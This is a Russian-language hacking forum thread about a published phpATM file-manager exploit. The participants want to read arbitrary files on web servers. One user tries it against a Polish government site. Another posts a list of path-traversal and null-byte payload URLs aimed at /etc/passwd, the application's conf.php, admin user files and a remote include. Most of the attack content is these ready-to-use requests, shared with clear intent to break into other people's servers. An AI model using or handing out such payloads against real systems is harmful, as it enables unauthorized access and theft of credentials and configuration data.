Разьясните что делает эта уязвимость ?!

http://www.milw0rm.com/exploits/2968

Там же всё прекрастно Написано

in folder users we dont find any file like: .htaccess so we can read all files :)
or you can read all files in ftp :)

limpompo c энглишом проблем елси не сложно просвяти :)

написано что в пользовательской папке не будет файлов а-ля .htaccess, благодаря чему появится возможность читать все файлы (в том числе и по ftp)

Погодь погодь !! тоесть можно будет просматреть все файлы на веб сервере ?!

Погодь погодь !! тоесть можно будет просматреть все файлы на веб сервере ?!

я только перевёл :) ...сам сплоит не юзал и даже в код не зглядывал.

Хех придеца качать етот обмещик...конечно можно было сразу это зделать и не задавать глупых вопрос но вдруг дело выделки не стоит :)

ЭХ эта лень во всем она виновата :)

karabym - Если у тебя проблемы тебе надо на www.translate.ru/text.asp

limpompo спасиб будем пользоваться :)

Потыкался я тут с этим сплойтом работает он как веб скрипт но както криво...

Скажите лутше как составить запрос чтобы читать файло

http://site.gov.pl/upload/viewers/html.php?current_dir=..&filename=[file]

Я так понимаю current_dir=директория_на_вебсер ве&имя_файла=[раcширение_файла]

Попробовал так но чтото не получается..

Порылся по просторам тырнета и нашел кучу дыр под ето приложение :D

http://www.example.com/phpatm/viewers/txt.php?currentdir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/txt.php?currentdir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/htm.php?current_dir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/htm.php?current_dir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/html.php?current_dir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/html.php?current_dir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/htm.php?current_dir=http://www.asite.com%00
http://www.example.com/phpatm/html.php?current_dir=http:/&filename=www.asite.com
http://www.example.com/phpatm/viewers/zip.php?current_dir=../../../../../../../[filename].zip%00
http://www.example.com/phpatm/viewers/zip.php?current_dir=../../../../../../..&filename=[filename].zip
http://www.example.com/phpatm/viewers/txt.php?current_dir=../include&filename=conf.php
http://www.example.com/phpatmviewers/txt.php?current_dir=../userstat&filename=[admin_name].stat
http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/admin%00
http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/[admin_name]%00

Тема утратила смысл.Закрыто.